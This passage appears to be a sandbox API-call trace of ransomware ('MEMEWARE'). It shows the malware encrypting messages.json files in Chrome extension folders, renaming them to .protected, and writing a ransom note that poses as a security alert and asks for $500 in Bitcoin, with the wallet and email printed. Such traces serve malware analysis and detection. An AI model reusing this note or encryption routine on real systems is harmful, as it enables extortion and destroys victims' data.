[0078.825] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.825] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.825] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0078.825] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.825] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.825] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.825] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.826] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0078.826] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.826] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0078.826] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.826] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0078.826] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.826] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.827] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.827] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.827] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.827] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.827] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.827] CloseHandle (hObject=0x168) returned 1 [0078.827] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.protected") returned 165 [0078.827] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.protected")) returned 1 [0078.827] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.827] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.828] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\RESTORE_FILES.txt") returned 159 [0078.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.828] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.828] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.829] lstrlenA (lpString="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") returned 684 [0078.829] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0078.829] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.829] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.829] CloseHandle (hObject=0x164) returned 1 [0078.829] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.829] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0078.829] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0078.829] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0078.829] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0078.829] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0078.829] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk") returned 141 [0078.829] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0078.829] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0078.829] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\*") returned 143 [0078.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.830] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0078.830] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.830] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.830] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.830] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.830] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\.") returned 143 [0078.830] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.830] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.830] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.830] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.830] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.830] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.830] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.830] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\..") returned 144 [0078.830] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.830] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.830] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.830] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.830] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.830] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0078.830] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.830] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.830] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0078.830] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.830] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.830] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.830] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.831] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0078.831] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.831] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0078.831] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.831] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json") returned 155 [0078.831] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.831] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x10e, lpOverlapped=0x0) returned 1 [0078.831] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.831] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x10e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x10e, lpOverlapped=0x0) returned 1 [0078.832] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.832] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.832] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.832] CloseHandle (hObject=0x168) returned 1 [0078.832] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.protected") returned 165 [0078.832] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.protected")) returned 1 [0078.832] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.832] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.832] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\RESTORE_FILES.txt") returned 159 [0078.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.833] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.833] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.833] lstrlenA (lpString="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") returned 684 [0078.833] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0078.833] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.833] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.833] CloseHandle (hObject=0x164) returned 1 [0078.834] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.834] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0078.834] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0078.834] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0078.834] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0078.834] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0078.834] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi") returned 141 [0078.834] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0078.834] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0078.834] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\*") returned 143 [0078.834] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.835] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0078.835] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.835] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.835] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.835] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.835] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\.") returned 143 [0078.835] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.835] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.835] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.835] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.835] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.835] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.835] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.835] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\..") returned 144 [0078.835] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.835] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.835] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.835] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.835] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.835] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0078.835] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.835] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.835] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0078.835] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.835] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.835] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.835] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0078.836] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
